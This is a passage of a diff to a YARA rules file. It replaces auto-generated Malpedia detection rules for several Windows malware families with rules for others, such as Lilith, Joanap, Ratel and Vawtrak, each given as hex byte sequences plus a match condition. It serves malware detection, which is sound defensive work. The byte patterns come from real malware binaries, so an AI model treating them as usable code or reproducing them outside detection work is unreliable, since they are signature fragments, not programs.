85f6 754c } - $sequence_4 = { 4503c1 453bc1 4183d200 4403c0 443bc0 45894304 } - $sequence_5 = { 448bc3 e8???????? 448bc3 33d2 498bcd e8???????? 498bcd } - $sequence_6 = { 4c0f45c0 488b05???????? 4885c0 480f45d0 488d442448 4889442430 4c896c2428 } - $sequence_7 = { 488bd0 498bcc e8???????? 4d8b0c24 458b44240c 33d2 } - $sequence_8 = { 48895c2428 89442420 e8???????? 448b05???????? 4533c9 ba9d010000 b900001000 } - $sequence_9 = { 4533c9 4533c0 babf000000 b900001000 48895c2428 89442420 e8???????? } + $sequence_0 = { 0f8407feffff bb01000000 4b 90 43 8b854cfeffff } + $sequence_1 = { 50 8d8500fcffff 50 6a00 } + $sequence_2 = { 85db 7463 ff75f8 e8???????? 84c0 7457 } + $sequence_3 = { 8d85f4fdffff 50 e8???????? 6a0c 8d85e8fdffff 50 e8???????? } + $sequence_4 = { 50 e8???????? 680c010000 8d85f4faffff } + $sequence_5 = { 8b4508 8945cc 8b7d0c 8b4510 } + $sequence_6 = { 53 e8???????? 83fe0c 7509 ff75f0 } + $sequence_7 = { 85c0 0f847d000000 ff75f4 e8???????? } + $sequence_8 = { c645c401 eb23 6a00 6a00 6a00 } + $sequence_9 = { 83c040 8985e4fdffff 8b85e0fdffff 0385d0fdffff 8b583c 83bdccfdffff0c } condition: - 7 of them and filesize <573440 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Netspy_Auto : FILE +rule MALPEDIA_Win_Waterminer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59f8d53f-335b-5ed2-a6be-e28bbbbbcf22" + id = "a6c61a63-af94-546a-ae52-fcf958232615" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netspy_auto.yar#L1-L104" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.waterminer_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "5f6115aa578488570bf6917737e346bbf4658a865ab8c32a6d3ce07b27ad566b" + logic_hash = "3dbc2a8def87fd5744e5b18617b0d65739b7ff2d0b5a69125fd601baee65e3fe" score = 75 quality = 75 tags = "FILE" @@ -174522,30 +177195,38 @@ rule MALPEDIA_Win_Netspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f45c8 488b85e8330000 8908 8b15???????? 833d????????0a 0f9cc1 } - $sequence_1 = { 4989e1 4c898d905b0000 e8???????? 4829c4 488b85f81e0000 4989e1 } - $sequence_2 = { e9???????? 488b85003a0000 8b10 89d1 } - $sequence_3 = { c3 488b4df0 b810000000 e8???????? 4829c4 } - $sequence_4 = { 488b8578430000 8b00 898580430000 8b15???????? 833d????????0a 0f9cc1 } - $sequence_5 = { 4889e1 e8???????? 4829c4 488b85d8310000 4889e2 458910 } - $sequence_6 = { e8???????? 4829c4 488b8540150000 4989e1 4c898d00600000 e8???????? } - $sequence_7 = { a801 0f8515000000 65488b042560000000 488985406b0000 e9???????? 488b85406b0000 488b4018 } + $sequence_0 = { 8b8514f3ffff e9???????? 83bda4f5ffff00 0f8532010000 8b8db8f5ffff c1e104 83bc0dbcf9ffff00 } + $sequence_1 = { 03442410 4403e8 428b4405e7 418bd5 } + $sequence_2 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f } + $sequence_3 = { 51 b804000000 6bc019 8b8880434b00 330d???????? 894dfc 740d } + $sequence_4 = { 8b8da4fbffff 83e901 898da4fbffff 83bd10fbffff00 } + $sequence_5 = { 8bcd 50 8d15b0854300 e8???????? } + $sequence_6 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 } + $sequence_7 = { 0344240c 4403d0 488d051a560500 418b0400 } + $sequence_8 = { 03c1 03d0 488d051e580500 418b0400 } + $sequence_9 = { 83bd60ffffff0b 0f8711060000 8b8d60ffffff ff248d74304800 0fbe55d3 } + $sequence_10 = { 02c8 41880c18 418a03 240f } + $sequence_11 = { 0344240c 4403d0 428b4405e7 418bd2 } + $sequence_12 = { 02d0 49ffc3 418d4001 881418 } + $sequence_13 = { c78538fbffff01000000 eb0a c78538fbffff00000000 8b8538fbffff 898530fbffff } + $sequence_14 = { 8b95c4fbffff 8995f0fbffff 8b85ecfbffff 055d010000 898580fbffff } + $sequence_15 = { 33c5 8945fc 8bf4 6a00 8bfc ff15???????? 3bfc } condition: - 7 of them and filesize <12033024 + 7 of them and filesize <1556480 } -rule MALPEDIA_Win_Downdelph_Auto : FILE +rule MALPEDIA_Win_Lilith_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9652ab66-5cde-50a7-9cf0-943c75b27c39" + id = "7c9f283d-efd5-5ce1-a88d-5c399c9e9911" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.downdelph_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lilith_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "800e73805e0adaa63996d81ee2c529d701882055ee15e51dd88ba5a4c6bc228a" + logic_hash = "9246de5695a5f1adcfda29165a048565982f491bffcb4e11939fadd1e6d8bd64" score = 75 quality = 75 tags = "FILE" @@ -174559,32 +177240,32 @@ rule MALPEDIA_Win_Downdelph_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c9 0f84d2feffff 53 56 57 89c3 } - $sequence_1 = { 83c4f8 8bf2 33d2 8bdc } - $sequence_2 = { e8???????? 48 50 8bc3 b901000000 8b15???????? } - $sequence_3 = { 8d55d8 e8???????? 8b5708 88041a } - $sequence_4 = { 53 56 33db 899de0fbffff } - $sequence_5 = { 0f8cd6020000 46 33ff 8b15???????? 8bc7 e8???????? } - $sequence_6 = { 8b45fc e8???????? 50 8b45f0 } - $sequence_7 = { 2bd3 2bd7 8bfa 85ff 7d02 33ff } - $sequence_8 = { 68???????? 64ff32 648922 6a00 6800000080 } - $sequence_9 = { ff05???????? 7544 b8???????? e8???????? b8???????? } + $sequence_0 = { 50 ff15???????? 6857040000 898698210000 ff15???????? } + $sequence_1 = { e8???????? 8bce e8???????? 83c418 8bcf e8???????? 8d4dd0 } + $sequence_2 = { 8b0c85a84b4300 8b45e8 f644012880 7446 0fbec3 83e800 742e } + $sequence_3 = { 25f0070000 660f28a010e94200 660f28b800e54200 660f54f0 660f5cc6 660f59f4 660f5cf2 } + $sequence_4 = { 8b0485a84b4300 80640828fe ff33 e8???????? 59 e9???????? 8b0b } + $sequence_5 = { c60000 833d????????10 b8???????? c745cc01000000 0f4305???????? } + $sequence_6 = { e9???????? c745dc03000000 c745e0c8874200 e9???????? } + $sequence_7 = { c1fa06 8934b8 8bc7 83e03f 6bc830 8b0495a84b4300 8b440818 } + $sequence_8 = { 8b4d08 898814434300 68???????? e8???????? 8be5 } + $sequence_9 = { 660f122c8510a74200 03c0 660f28348520ab4200 ba7f3e0400 e9???????? 8bd0 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <499712 } -rule MALPEDIA_Win_Darkme_Auto : FILE +rule MALPEDIA_Win_Joanap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "08b1ecd8-4245-5b36-9b97-82dc7b781460" + id = "7b68fae3-26c2-54e0-a3e7-133f1581d080" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkme_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.joanap_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "8ec0d0c962cec5e0ecd8c6f133e096757eb87617c4861f80c1b1cf3c91f3cada" + logic_hash = "e8c4ce689f2f9423d9b3c5df5ab94aca097fbbc5a318100a67230ed53bf34f3c" score = 75 quality = 75 tags = "FILE" @@ -174598,32 +177279,32 @@ rule MALPEDIA_Win_Darkme_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8dbddcfcffff f3ab b964000000 8dbd18fbffff 68???????? 8985d8fcffff 8985d4fcffff } - $sequence_1 = { 51 8d55d4 52 6a02 ff15???????? 83c40c 8d45c4 } - $sequence_2 = { 8b8518ffffff 8b08 8b9518ffffff 52 ff5114 dbe2 } - $sequence_3 = { 6a00 ff15???????? 50 8b558c 81c2???????? 52 ff15???????? } - $sequence_4 = { c745880a000000 8b8530ffffff 50 ff15???????? 8945a0 c7459808000000 8b4dd4 } - $sequence_5 = { 8b8500ffffff 50 8b8dfcfeffff 51 ff15???????? 898594feffff eb0a } - $sequence_6 = { 05???????? 898588feffff eb12 8b8db4feffff 81c1???????? 898d88feffff 8b9588feffff } - $sequence_7 = { 83c42c 51 68???????? ff15???????? 85c0 0f851afeffff } - $sequence_8 = { 8b5144 52 8d8524ffffff 50 8d8d54ffffff 51 ff15???????? } - $sequence_9 = { 8b08 8b95fcfeffff 52 ff5120 } + $sequence_0 = { 8b8c242c010000 66c74424140200 51 c744241c7f000001 ff15???????? 8d542414 } + $sequence_1 = { 56 85c0 57 0f8483000000 53 ff15???????? 50 } + $sequence_2 = { 0f8488000000 6a04 e8???????? 8b442414 8d6b06 66897304 } + $sequence_3 = { f7d1 49 81f908020000 7332 56 ff15???????? 8bf8 } + $sequence_4 = { 750c 8d8c24b8020000 e9???????? 8d8c241b020000 51 56 ffd7 } + $sequence_5 = { 85c0 0f85cbfeffff 8b4c2410 51 ff15???????? 57 ff15???????? } + $sequence_6 = { ff15???????? 85c0 0f84cf000000 8b4c2420 51 6a01 68ff0f1f00 } + $sequence_7 = { 55 8bac2420010000 56 8b35???????? 57 33ff 8b842424010000 } + $sequence_8 = { 8b442414 83c018 47 3dd0020000 89442414 0f8c73ffffff 8b742410 } + $sequence_9 = { 0bc0 5b 81c470210000 c3 6a01 6820bf0200 8d8c2488010000 } condition: - 7 of them and filesize <1515520 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Jimmy_Auto : FILE +rule MALPEDIA_Win_Sunorcal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6665c46a-fce5-5107-8692-d73430db94ca" + id = "8d478635-7b1a-5ec4-85a6-3854fefcfed4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jimmy_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sunorcal_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "5955b25aaac6bf582c8efb23dc58fc592d4dcf4b96826a166327d6d4b0ee873a" + logic_hash = "58249461fa7cf2580b3033b5e590d54e14d2db390f8c7cf00dbe39cb0b927df2" score = 75 quality = 75 tags = "FILE" @@ -174637,32 +177318,32 @@ rule MALPEDIA_Win_Jimmy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8908 eb11 e8???????? 8945f4 ff75f8 e8???????? 59 } - $sequence_1 = { 8b4508 83602c00 8b45fc c9 c3 55 8bec } - $sequence_2 = { 89814c010000 eb27 a1???????? 8b4de4 898840010000 ff75e4 } - $sequence_3 = { ff7508 ff55fc 59 59 c9 c3 55 } - $sequence_4 = { 6a73 58 668945f2 6a20 58 668945f4 6a25 } - $sequence_5 = { 8b4508 ff702c 8b4508 ff7024 e8???????? 59 59 } - $sequence_6 = { 50 8d45c4 50 8b4508 83c008 50 6a00 } - $sequence_7 = { 85c0 7419 8b45fc 0fbe00 8b4df8 0fbe09 } - $sequence_8 = { e8???????? 59 b001 c9 c20800 } - $sequence_9 = { 6a09 e8???????? 59 59 8945fc ff7510 ff750c } + $sequence_0 = { 6a03 e8???????? cc 55 8bec 83ec0c a1???????? } + $sequence_1 = { c21000 8b442404 8b00 813863736de0 752a 83781003 7524 } + $sequence_2 = { 5e 5b c21000 8b442404 8b00 813863736de0 752a } + $sequence_3 = { ff15???????? 33c0 c3 c3 55 8bec } + $sequence_4 = { 7c02 eb0e e8???????? e8???????? 85c0 } + $sequence_5 = { 5b c21000 8b442404 8b00 813863736de0 } + $sequence_6 = { 68b7000000 ff15???????? 6a64 68???????? } + $sequence_7 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 } + $sequence_8 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? 6a67 } + $sequence_9 = { 68???????? ff15???????? 33c0 c3 c3 55 8bec } condition: - 7 of them and filesize <188416 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Hazy_Load_Auto : FILE +rule MALPEDIA_Win_Ratel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9ce3341-35f2-576a-ac44-5d1a215a7e85" + id = "0998b123-774e-59b1-8ca2-1a95e1fb9bf7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hazy_load_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratel_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "2293495fdcc042b4bc9589ccdd3e32857e18de0ce6c242812538dc1d663eb294" + logic_hash = "32361790b47e0503007c9763001c72d5f3f0666a6e89a8bab7c3bc0bd295eb6a" score = 75 quality = 75 tags = "FILE" @@ -174676,32 +177357,32 @@ rule MALPEDIA_Win_Hazy_Load_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b904000000 4c8d05f5c50000 488d15aeb20000 e8???????? 488bf8 4885c0 740f } - $sequence_1 = { 48897c2408 488b15???????? 488d3dd16d0100 8bc2 b940000000 83e03f 2bc8 } - $sequence_2 = { 488d0db8200100 4183e23f 4903e8 832700 498bf0 } - $sequence_3 = { 488bf1 41bc02000000 4489742420 418bcc 448d4205 ff15???????? } - $sequence_4 = { 4b87bcf750140200 33c0 488b5c2450 488b6c2458 488b742460 } - $sequence_5 = { 483b0d???????? 7417 488d0570630100 483bc8 740b 83791000 7505 } - $sequence_6 = { 4883675000 488d05ade0ffff 83675800 488d4f28 } - $sequence_7 = { 488d15a96a0100 83e13f 488bc5 48c1f806 48c1e106 } - $sequence_8 = { 442bc3 4803d0 4533c9 488bce ff15???????? 85c0 0f8eacfeffff } - $sequence_9 = { 488d0dc0210100 4183e23f 4903e8 832300 } + $sequence_0 = { 89d9 e8???????? 85c0 75e7 89d9 e8???????? 89d9 } + $sequence_1 = { a1???????? 85c0 0f85bb010000 8b41fc 8d50ff 8951fc } + $sequence_2 = { 8b442454 8b542414 8b400c 85d2 0f851f040000 83f802 } + $sequence_3 = { 8bbc24b0000000 e8???????? 8b00 c744245cffffffff c7442460ffffffff 89442428 8b8424a4000000 } + $sequence_4 = { 0f83a3020000 0fb700 6683f8ff b800000000 0f4545ac 8945ac b800000000 } + $sequence_5 = { 668993f0000000 c783f400000000000000 c783f800000000000000 c783fc00000000000000 c7830001000000000000 c703???????? c7437c98ce4b00 } + $sequence_6 = { c703???????? c7437884124c00 e8???????? 89b3f0000000 83ec04 8d65f4 5b } + $sequence_7 = { 0f9fc1 084dc9 8b4d08 8345cc01 8b4108 3b410c 0f8240ffffff } + $sequence_8 = { 8b4340 c7431400000000 c7431000000000 0fb67b58 894304 894308 89430c } + $sequence_9 = { 8d4304 89c1 89c6 e8???????? 89b3ec000000 83ec04 8d65f4 } condition: - 7 of them and filesize <315392 + 7 of them and filesize <2174976 } -rule MALPEDIA_Win_Poohmilk_Auto : FILE +rule MALPEDIA_Win_Danbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4a533432-ed1d-58b3-b34c-6e80b5d4a8fb" + id = "2c585571-1377-525b-81df-f475b9f7d032" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poohmilk_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.danbot_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ecd179731e16caedb85d9961e87834bc792941e3499df96bf9bfcadeaf395c81" + logic_hash = "7b636202f57d607cd3195402deda2493294df662e32f18cd69328119b0c63f1c" score = 75 quality = 75 tags = "FILE" @@ -174715,34 +177396,34 @@ rule MALPEDIA_Win_Poohmilk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { d3eb 2bf1 8b0c850c344100 014c822c 40 89856cffffff e9???????? } - $sequence_1 = { 898560f3ffff c705????????00000000 ffd7 8d8dccf7ffff 51 } - $sequence_2 = { 0301 eb02 33c0 8b4d08 85c9 7406 } - $sequence_3 = { 898d74d2ffff 898d78d2ffff 3bd9 7417 3bc1 7513 33c0 } - $sequence_4 = { 83ffff 0f8410010000 53 8b1d???????? 6a02 } - $sequence_5 = { 8bd6 e8???????? 33c9 3b85a4fdffff 5f } - $sequence_6 = { 85c0 0f8499000000 68???????? 8d842424020000 50 ffd6 8b4c2410 } - $sequence_7 = { 23fb d3eb 0fbe8a10344100 03f9 } - $sequence_8 = { 5e c21000 8bff 55 8bec 8b4d0c } - $sequence_9 = { 8b4710 8b4e28 53 52 8b5624 } + $sequence_0 = { 66893c48 448b4374 488b4b68 41ffc8 4d03c0 e8???????? 48638bac000000 } + $sequence_1 = { 8a4004 88040a 44016b28 8b5328 488b4330 488b4b10 8a4005 } + $sequence_2 = { 483bd7 7213 48ffc2 4c8bc3 488b8c2480030000 e8???????? 4c89b42490030000 } + $sequence_3 = { e9???????? 488b8a80000000 e9???????? 488b8a78000000 e9???????? 488b8a28000000 e9???????? } + $sequence_4 = { 4154 4155 4157 4881ec10060000 48c780a8fafffffeffffff 48895808 48897010 } + $sequence_5 = { 488b9424f0000000 4883fa10 7214 48ffc2 4d8bc4 488b8c24d8000000 e8???????? } + $sequence_6 = { 48ffc2 4d8bc6 488b8c2428010000 e8???????? 48899c2438010000 4889bc2440010000 889c2428010000 } + $sequence_7 = { 488b55df 4883fa08 7212 48ffc2 41b802000000 488b4dc7 e8???????? } + $sequence_8 = { 0fb6442420 84db 410f44c4 8ad8 895c2420 eb25 4c8b742460 } + $sequence_9 = { ffd3 99 33c2 2bc2 89442430 448be0 4c89642450 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <1492992 } -rule MALPEDIA_Win_Decaf_Auto : FILE +rule MALPEDIA_Win_Spedear_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "871b7c64-9bb1-5d5d-b760-fe69f683da0a" + id = "064ca511-db37-50e7-a5f5-98bdd145296d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.decaf_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spedear_auto.yar#L1-L246" license_url = "N/A" - logic_hash = "2f8679cf6195e76585744c378fca956597817fdb2b26b865768f35c66fced6eb" + logic_hash = "3ab20c94a066f6f4783dff8cb4bf09780239780b3bd9f55c80bdf4166aa7a997" score = 75 - quality = 75 + quality = 71 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -174754,32 +177435,48 @@ rule MALPEDIA_Win_Decaf_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? e8???????? 48898424a8180000 48899c2440060000 488b0d???????? 48898c2420230000 488d0543040c00 } - $sequence_1 = { 4c8b442470 4889c7 4889ce 488b442440 c7041fcacccec6 b905000000 e9???????? } - $sequence_2 = { e9???????? 4c8d4302 4c39c6 7337 4c89442468 488d05d8a30300 4889d9 } - $sequence_3 = { c3 488d0582761b00 bb10000000 e8???????? 4889f8 b900200000 e8???????? } - $sequence_4 = { e8???????? 488b8c24b8040000 48894808 833d????????00 7514 488b8c2410160000 488908 } - $sequence_5 = { eb1c 4889c7 488b8c24f0120000 e8???????? 488d3d53871f00 e8???????? e8???????? } - $sequence_6 = { e8???????? 488d05d4ad1300 488d1d95d21900 e8???????? 4d8d6830 4c89d6 4d89ea } - $sequence_7 = { e9???????? 90 66c744244f1c14 0fb654244f 88542445 440fb6442450 4488442444 } - $sequence_8 = { c6041f95 31c9 e9???????? 4983f809 754d 4c8d4301 4c39c6 } - $sequence_9 = { e9???????? 48895c2428 4889442430 488d0d664c1d00 bf0d000000 e8???????? 4885c0 } + $sequence_0 = { 83e207 03c2 c1f803 83c40c } + $sequence_1 = { 8b4718 8a5f06 50 894608 e8???????? } + $sequence_2 = { 53 50 e8???????? 8b7e0c 895e10 } + $sequence_3 = { 894618 ffd7 89461c 5f } + $sequence_4 = { 33f6 8b4704 8b4f08 53 50 8bde e8???????? } + $sequence_5 = { 8b44240c 8b08 8b442410 53 55 } + $sequence_6 = { c1e208 40 0bca 3bc3 7c02 } + $sequence_7 = { 5b c20400 8b4c240c 57 53 51 } + $sequence_8 = { 6a00 68???????? e8???????? 83c40c 68d0070000 } + $sequence_9 = { 833e00 741e 8b5608 8b4604 6a00 } + $sequence_10 = { 833e00 741a 6a00 6a00 ff7608 } + $sequence_11 = { 6a00 ff7608 ff5604 6800800000 } + $sequence_12 = { 394878 7456 39487c 7451 } + $sequence_13 = { 8bc7 5e 5f 5b 5d c3 6a08 } + $sequence_14 = { ff5604 6800800000 6a00 ff7608 } + $sequence_15 = { 74ce 56 53 ff7510 ff75d8 6a00 6a00 } + $sequence_16 = { 4154 4883ec20 4c8b5120 4d8be0 488bea 410fb74206 488bf1 } + $sequence_17 = { 418d5001 488bcf 4803c7 48894308 } + $sequence_18 = { 50 8d4de0 e8???????? 83781410 59 5b 7202 } + $sequence_19 = { 750b 488bcf ff15???????? eb07 488bd5 } + $sequence_20 = { 488bc3 488d152bd50000 48c1f805 83e11f 488b04c2 486bc958 } + $sequence_21 = { 723a 488d05349b0000 483bd8 772e } + $sequence_22 = { 488364242000 40886c245c 488d0d10d10000 4c8d4c244c } + $sequence_23 = { 8a80b4182400 08443b1d 0fb64601 47 3bf8 76ea } + $sequence_24 = { 4883ec20 488d05fe690000 488bfa 488bd9 488901 } + $sequence_25 = { 488d15032e0000 488bce 488905???????? ff15???????? } condition: - 7 of them and filesize <7193600 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE +rule MALPEDIA_Win_Coredn_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b802015-a125-5833-acd7-30aed08841d8" + id = "06de0230-4bd5-5e45-a730-cba0310a794f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vhd_ransomware_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coredn_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "32d97d3009fbca3c4f84bd22721b2479eac7cefb08b428240c2e9ebde9b435cb" + logic_hash = "706fde100ad28c7717e1440d078632bf0db4418173418e843d6c6c3781f1d1c0" score = 75 quality = 75 tags = "FILE" @@ -174793,34 +177490,39 @@ rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b450c 4a 3bd0 7d10 8bc8 } - $sequence_1 = { 68???????? 8d45f4 50 c745f4d8514100 e8???????? cc 8bff } - $sequence_2 = { e8???????? 8b8514e6ffff 48 83c404 4b 898514e6ffff 85c0 } - $sequence_3 = { f3ab 8b8dccfcffff 890a 85c9 7e98 8d4a04 } - $sequence_4 = { c1eb18 0fb69b98744100 c1e308 0bda 8b55cc c1ea08 0fb6d2 } - $sequence_5 = { 66895c2460 897c241c c7442420c05d4000 897c2424 897c2428 } - $sequence_6 = { 7d10 895c8204 ff02 8bde 33f6 8bcb 0bce } - $sequence_7 = { e8???????? b9c9000000 8bf0 8dbd7cf6ffff } - $sequence_8 = { 46 83fe40 7cee 8d4d9c 51 8d8d84baffff e8???????? } - $sequence_9 = { ff15???????? 32c0 e9???????? 6a00 8d8588b4ffff 50 6800200000 } + $sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 } + $sequence_1 = { 7506 48 bf7a000780 c60000 8bc7 5f 5b } + $sequence_2 = { 8a1c06 84db 741c 8818 4a 40 } + $sequence_3 = { 83ea01 75e7 8851ff b87a000780 } + $sequence_4 = { 8be5 5d c20400 85c9 7506 48 bf7a000780 } + $sequence_5 = { 8bec 56 8b7508 ba04010000 2bf1 } + $sequence_6 = { 8a040e 84c0 7415 8801 41 83ea01 } + $sequence_7 = { 85d2 750d 8851ff b87a000780 5e } + $sequence_8 = { 8b550c 83ec20 33c9 8bc1 3914c5a81b4100 7408 } + $sequence_9 = { 8b45fc 81784890334100 7409 ff7048 e8???????? 59 c70701000000 } + $sequence_10 = { eb04 85c9 7508 83e802 bb7a000780 33c9 } + $sequence_11 = { c644241301 f6c301 744c 8b442414 } + $sequence_12 = { e9???????? c745e0a4124100 eba2 894ddc c745e0a4124100 e9???????? c745dc03000000 } + $sequence_13 = { 660fd60f 8d7f08 8b048d942e4000 ffe0 f7c703000000 7413 } + $sequence_14 = { 23c1 eb55 8b1c9d30d24000 56 6800080000 6a00 53 } condition: - 7 of them and filesize <275456 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Buterat_Auto : FILE +rule MALPEDIA_Win_Vawtrak_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e97b50a-971b-5a6b-945e-3e34fedb231a" + id = "b724e7c8-fa8b-5ecb-9091-2adfef543aee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buterat_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vawtrak_auto.yar#L1-L212" license_url = "N/A" - logic_hash = "eb64ab06f54c3ecee14053c6efd01e298ad3b6ab4366443760576f0899003a4d" + logic_hash = "2420d7270c56567b74aa80afdfcc3b5893cd81eeb0dabc0a53855a9b85be220c" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -174832,32 +177534,45 @@ rule MALPEDIA_Win_Buterat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 8d4dfc 51 57 50 53 } - $sequence_1 = { 750a 56 6a07 e8???????? 59 59 ff750c } - $sequence_2 = { ff15???????? 8b5d75 53 33c0 e8???????? 85c0 59 } - $sequence_3 = { 56 57 33f6 e8???????? 85c0 59 0f868b000000 } - $sequence_4 = { 750b e8???????? 99 f77dfc 8bda 837d6806 } - $sequence_5 = { 8d8564dfffff 50 8bc3 e8???????? 83c40c ff75f4 ffd7 } - $sequence_6 = { 8bec b800100000 e8???????? 8b4d08 } - $sequence_7 = { e8???????? 83c40c 85c0 0f8424010000 68???????? 53 68???????? } - $sequence_8 = { 41 41 47 3b7d0c 72cd 5b 33c0 } - $sequence_9 = { 33db 385d1c 56 57 895df0 750d 8a4518 } + $sequence_0 = { 6a01 ff35???????? 6a04 6a01 50 ff15???????? 85c0 } + $sequence_1 = { 6a00 6a00 e8???????? 50 ff15???????? } + $sequence_2 = { 837d1040 752d 8b4d04 e8???????? 85c0 } + $sequence_3 = { 8b4d08 e8???????? 85c0 7415 ff15???????? 50 } + $sequence_4 = { ba00ff0000 8bc1 23c2 3bc2 } + $sequence_5 = { 750f 33c9 e8???????? 